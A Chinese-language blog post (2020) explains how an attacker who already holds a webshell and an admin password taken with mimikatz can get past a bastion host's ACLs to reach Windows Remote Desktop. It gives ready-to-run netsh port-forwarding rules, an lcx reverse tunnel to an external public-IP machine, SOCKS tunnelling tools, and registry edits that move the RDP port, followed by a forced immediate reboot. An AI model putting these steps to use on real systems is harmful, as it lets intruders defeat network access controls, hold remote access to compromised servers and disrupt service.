如何繞過堡壘機遠端登入
阿新 • • 發佈:2020-08-10
假設一個場景:在Webshell中執行mimikatz獲取到win管理員密碼,並且本地檢視埠3389是開放的,可是從當前跳板機無法遠端到目標機器。因為某個特定需求,一定要遠端登入到這臺win伺服器,這時該怎麼辦?
首先我們先分析一下這個場景,埠開放卻無法連線,最有可能的情況,就是到達目標網段受到ACL策略限制,只允許通過特定網段登入,比如說堡壘機。大多數堡壘機部署時,為了不改變現有的網路拓撲結構,採用旁路部署的方案,通過ACL策略限制使用者訪問特定埠。
那麼,我們就可以用另一種方式來描述這個問題:目標伺服器遠端埠受到ACL限制,但其他埠沒有限制,那麼,最簡單的解決方式就可以通過埠轉發來繞過。
1、使用netsh命令進行埠轉發
Windows自帶的netshnetsh實現埠轉發,監聽12345埠,轉發到本地3389埠,可繞過訪問策略限制。
#A、3389埠轉發到12345埠
netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389
#B、檢視配置好的埠對映清單
C:\Windows\system32>netsh interface portproxy show v4tov4
偵聽 ipv4: 連線到 ipv4:
地址 埠 地址 埠
--------------- ---------- --------------- ----------
192.168.126.32 12345 192.168.126.32 3389
這樣一來,通過攻擊機跳板機直接遠端目標機器的12345埠,就可以實現遠端登入。
2、LCX 埠轉發
在目標機器上執行:lcx.exe -slave 公網ip 51 內網ip 3389
在公網的機器執行:Lcx.exe –listen 51 3340
本地機器上連線 127.0.0.1:3340,即可連線上目標機器的3389。
3、內網穿透工具
SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等
通過利用SOCKS協議,結合Proxifier使用,可實現mstsc登入目標主機。
4、修改Windows遠端桌面埠
通過修改Windows預設遠端桌面埠,從而繞過ACL策略訪問限制。
修改登錄檔,命令如下:
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 12345/f
REG ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f
強制重啟目標伺服器後,登錄檔生效。
shutdown -r -t 0
此時,就可以遠端目標伺服器的12345登入。